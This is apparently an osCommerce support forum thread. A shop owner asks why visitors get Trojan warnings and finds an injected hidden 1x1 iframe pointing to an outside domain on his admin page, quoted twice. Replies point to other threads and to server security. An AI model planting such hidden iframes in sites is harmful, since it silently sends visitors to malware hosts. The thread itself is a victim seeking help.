Trojan Virus in OSC????

[jonw118]

OK, this is weird... is it possible?

 

I had a customer say everytime he's come to my site he gets a Trojan horse warning from his AV.

 

When I log into check orders my Anti-Virus pops up, right when I log in.

 

How in the world would a trojen be in OSC? I don't much about how that stuff works.

 

How would I get it off the server?

 

THANKS!

[jonw118]

OK- Upon further follow-up... I found this as the first line on the admin home page:

 

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

 

The admin is completely secured with user/pass and under an SSL.

 

How could this have happened? I AM THE ONLY ONE WITH THE USER/PASS - AND IT'S A HARD ONE!

 

I want to prevent this from happening again as we are getting near busy season.

[knifeman]

OK- Upon further follow-up... I found this as the first line on the admin home page:

 

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

 

The admin is completely secured with user/pass and under an SSL.

 

How could this have happened? I AM THE ONLY ONE WITH THE USER/PASS - AND IT'S A HARD ONE!

 

I want to prevent this from happening again as we are getting near busy season.

There have been other posts about this iframe.

http://www.oscommerce.com/forums/lofiversion/i...hp/t205813.html

 

Tim

[bobg7]

It's not a matter of how well your admin pages are secured in this case (username/password) but how secure the server it's self is.